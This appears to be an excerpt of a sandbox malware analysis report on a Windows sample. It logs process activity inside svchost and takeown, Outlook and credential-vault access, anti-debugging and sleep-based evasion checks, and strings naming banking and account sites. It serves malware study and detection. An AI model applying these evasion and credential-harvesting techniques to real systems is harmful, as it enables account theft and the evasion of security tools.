                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: IBbGrGi4A7.exeStatic file information: File size 1167360 > 1048576
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: IBbGrGi4A7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329449489.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330485725.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp
                Source: IBbGrGi4A7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: IBbGrGi4A7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: IBbGrGi4A7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: IBbGrGi4A7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: IBbGrGi4A7.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00314B37 LoadLibraryA,GetProcAddress,0_2_00314B37
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00338945 push ecx; ret 0_2_00338958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418800 push ebx; ret 1_2_00418805
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A10F push edi; iretd 1_2_0041A11E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A113 push edi; iretd 1_2_0041A11E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408138 push es; ret 1_2_00408139
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A1C6 push edi; iretd 1_2_0041A1C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004139B1 push esp; ret 1_2_00413A0A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413A8F push es; iretd 1_2_00413A9E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401430 push ds; retf 1_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040154E push esi; iretd 1_2_00401557
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004015BF push ds; retf 1_2_00401600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A6EB push cs; ret 1_2_0041A6EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EF2A push edi; iretd 1_2_0041EF2D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FF0 push eax; ret 1_2_00402FF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx1_2_037309B6
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C625E9 push cs; ret 2_2_04C625EA
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C606FE push ebx; ret 2_2_04C60703
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C66E28 push edi; iretd 2_2_04C66E2B
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C5FF51 push eax; retf 2_2_04C5FF52
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C620C4 push edi; iretd 2_2_04C620C5
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C6200D push edi; iretd 2_2_04C6201C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C62011 push edi; iretd 2_2_04C6201C
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exeCode function: 2_2_04C50036 push es; ret 2_2_04C50037
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02F609AD push ecx; mov dword ptr [esp], ecx3_2_02F609B6
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02590A7F push esi; retf 3_2_02590A8F
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02580A9C push es; iretd 3_2_02580AAB
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02590BFF push esp; iretd 3_2_02590C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025809BE push esp; ret 3_2_02580A17
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02585060 push eax; retf 3_2_02585061
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02575145 push es; ret 3_2_02575146
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0258711C push edi; iretd 3_2_0258712B
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003148D7
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00395376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00395376
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00333187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00333187
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeAPI/Special instruction interceptor: Address: 31A3224
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60D324
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60D7E4
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60D944
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60D504
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60D544
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60D1E4
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B610154
                Source: C:\Windows\SysWOW64\takeown.exeAPI/Special instruction interceptor: Address: 7FFC1B60DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
                Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 1912Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeWindow / User API: threadDelayed 8058Jump to behavior
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\takeown.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\takeown.exe TID: 5716Thread sleep count: 1912 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 5716Thread sleep time: -3824000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 5716Thread sleep count: 8058 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\takeown.exe TID: 5716Thread sleep time: -16116000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\L0o39BrLvRQHRGJJTVHX4K.exe TID: 5920Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\takeown.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037445A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037C6D1 FindFirstFileW,FindClose,0_2_0037C6D1
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C75C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037EF95
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F0F2
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F3F3
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003737EF
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B12
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BCBC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_0258C380 FindFirstFileW,FindNextFileW,FindClose,3_2_0258C380
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003149A0
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 1f2Wt16K.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 1f2Wt16K.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 1f2Wt16K.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 1f2Wt16K.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 1f2Wt16K.3.drBinary or memory string: discord.comVMware20,11696492231f
                Source: takeown.exe, 00000003.00000003.1265801658.0000000007756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116
                Source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.3.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 1f2Wt16K.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 1f2Wt16K.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 1f2Wt16K.3.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 1f2Wt16K.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 1f2Wt16K.3.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 1f2Wt16K.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 1f2Wt16K.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3329709800.0000000000769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 1f2Wt16K.3.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 1f2Wt16K.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 1f2Wt16K.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 1f2Wt16K.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: firefox.exe, 0000000A.00000002.1378188187.000002445532C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\takeown.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004172E3 LdrLoadDll,1_2_004172E3
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00383F09 BlockInput,0_2_00383F09
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00313B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00313B3A
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00345A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00345A7C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00314B37 LoadLibraryA,GetProcAddress,0_2_00314B37
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_031A3490 mov eax, dword ptr fs:[00000030h]0_2_031A3490
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_031A34F0 mov eax, dword ptr fs:[00000030h]0_2_031A34F0
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_031A1E70 mov eax, dword ptr fs:[00000030h]0_2_031A1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]1_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]1_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]1_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
